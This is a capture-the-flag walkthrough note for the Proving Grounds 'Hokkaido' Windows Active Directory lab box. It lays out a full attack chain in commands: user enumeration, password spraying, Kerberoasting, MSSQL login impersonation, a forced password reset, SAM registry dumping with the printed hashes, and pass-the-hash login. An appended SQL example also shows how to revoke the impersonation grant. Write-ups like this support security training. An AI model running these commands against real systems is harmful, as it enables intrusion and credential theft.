WDavid404 / PG-Box

PG box walkthrough note

Hokkaido (Intermediate, Windows AD) #60

Open WDavid404 opened 2 months ago

WDavid404 commented 2 months ago

Key points:

WDavid404 commented 2 months ago
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-12 06:57:26Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8530/tcp  open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
8531/tcp  open  unknown       syn-ack ttl 125
9389/tcp  open  mc-nmf        syn-ack ttl 125 .NET Message Framing
47001/tcp open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49671/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49675/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49684/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49685/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49691/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49700/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49701/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49712/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49769/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
58538/tcp open  ms-sql-s      syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM

139/tcp (SMB)

smbmap -u null -p "" -H 192.168.218.40 -P 445 -r 2>&1 --> no info

kerbrute -domain hokkaido-aerospace.com -dc-ip 192.168.184.40 -users /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 100 --> users:

info
administrator
discovery
maintenance

Create a small wordlist for passwords:

Winter2023
Summer2023
Spring2023
Fall2023
info
administrator
discovery
maintenance
ofni
rotartsinimda
yrevocsid
ecnanetniam

Let's brute-force using crackmapexec: crackmapexec smb 192.168.184.40 --shares -u users.txt -p pass.txt --continue-on-success --> info:info

crackmapexec smb 192.168.184.40 --shares -u info -p info

On the Homes share, found directories created with the users' names. Inside those directories, didn't find anything. On the NETLOGON share there is a temp folder which has a file password_reset.txt. That text file contains this text: Initial Password: Start123!

crackmapexec smb 192.168.184.40 -u users.txt -p Start123! --continue-on-success --> discovery:Start123!

evil-winrm login ---> all failed

impacket-GetUserSPNs -dc-ip 192.168.184.40 hokkaido-aerospace.com/discovery:Start123! -request

Tried to crack maintenance user’s hash but failed.

Tried to move to the MSSQL server and succeeded with discovery's credential: impacket-mssqlclient 'hokkaido-aerospace.com/discovery':'Start123!'@192.168.208.40 -dc-ip 192.168.184.40 -windows-auth

Check what databases are available. For MSSQL commands refer to https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md

SQL (HAERO\discovery  guest@master)> SELECT name FROM master..sysdatabases;
SQL (HAERO\discovery  guest@master)> use hrappdb
--> ERROR: Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.
--> We don't have permission to use hrappdb. Let's check whether there is any user we can impersonate on MSSQL.

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
--> 
hrappdb-reader

--> Let's log in as user "hrappdb-reader" and use the "hrappdb" database.

SQL (HAERO\discovery  guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader  guest@master)> use hrappdb

--> Let's view the data:
SQL (hrappdb-reader  hrappdb-reader@hrappdb)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
SQL (hrappdb-reader  hrappdb-reader@hrappdb)> select * from sysauth;
--> hrapp-service:Untimed$Runny


WinRM login with these creds but no luck.

Use BloodHound: bloodhound-python -u "hrapp-service" -p 'Untimed$Runny' -d hokkaido-aerospace.com -c all --zip -ns 192.168.208.40 --> hrapp-service has GenericWrite permission on the Hazel.Green user, which is a tier 2 admin.

targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.208.40 --> Got the hash of the hazel.green user. By cracking the hash we got the password: haze1988 (targetedKerberoast.py: This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the "kerberoast" hash, and delete the temporary SPN set for that operation. This is called targeted Kerberoasting.)

In BloodHound we can see hazel.green is a member of the IT group, so we can forcibly change the password of the tier 1 admin, which is MOLLY.SMITH. Let's use rpcclient to set the password.

rpcclient -N  192.168.208.40 -U 'hazel.green%haze1988'
$> setuserinfo2 MOLLY.SMITH 23 'Password123!'

Log in with MOLLY.SMITH's credentials: xfreerdp /u:molly.smith /p:'Password123!' /v:192.168.208.40 +clipboard

whoami /priv --> SeBackupPrivilege

reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

[Kali] impacket-secretsdump -system system -sam sam local  

-->

[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

now evil-winrm to the machine using administrator account: evil-winrm -i 192.168.184.40 -u administrator -H "d752482897d54e239376fddb2a2109e4"
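Added example, not part of WDavid404's note: the MSSQL impersonation step (EXECUTE AS LOGIN = 'hrappdb-reader') worked through in full. The enumeration query is rewritten to name both the grantee and the impersonable login, a sysadmin check follows the context switch (the same grant on a sysadmin login would be a full server takeover rather than a database read), REVERT drops the borrowed identity, and the last statement is the revoke a DBA would run to close the hole. hrappdb-reader, hrappdb and HAERO\discovery come from the note; the grantee named in the REVOKE is an assumption, since the note only shows that the discovery session could impersonate hrappdb-reader, not which principal the grant was made to.

```sql
-- Added example, not from the original note. hrappdb-reader, hrappdb and
-- HAERO\discovery come from the walkthrough; the grantee in the REVOKE is assumed.

-- 0. Starting point: the note lands as guest@master with no sysadmin role.
SELECT SYSTEM_USER                  AS login_name,
       USER_NAME()                  AS db_user,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 1. Server-level IMPERSONATE grants. For a permission on a login the securable
--    class is SERVER_PRINCIPAL and major_id is the login that may be impersonated,
--    so joining on major_id names the target explicitly and the grantee join shows
--    who received the right (the note's query only listed the grantor side).
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals  AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals  AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc      = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W');          -- GRANT, or GRANT WITH GRANT OPTION

-- 2. Same check at database level (class DATABASE_PRINCIPAL), run inside each
--    database you can already enter; user impersonation is the other common path.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       p.state_desc
FROM sys.database_permissions AS p
JOIN sys.database_principals  AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.database_principals  AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc      = 'DATABASE_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W');

-- 3. Borrow the identity and confirm what it buys before reading anything.
EXECUTE AS LOGIN = 'hrappdb-reader';
SELECT SYSTEM_USER AS now_running_as, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
USE hrappdb;                          -- allowed after EXECUTE AS LOGIN (not after EXECUTE AS USER)
SELECT TABLE_SCHEMA, TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';
-- ... the note reads hrapp-service's password from sysauth at this point ...
REVERT;                               -- drop the borrowed context

-- 4. Defender side (run as sysadmin). An IMPERSONATE grant on a login with more
--    database access than the grantee is the misconfiguration; revoke it unless
--    there is a documented need. The grantee here is an assumption; use the
--    value step 1 returned (it may be [public] rather than a single login).
REVOKE IMPERSONATE ON LOGIN::[hrappdb-reader] FROM [HAERO\discovery];
```

If step 2 shows a user-level grant instead, the analogous move inside that database is EXECUTE AS USER = '...'; that context cannot cross databases with USE, so it reaches only what that user holds in the current database.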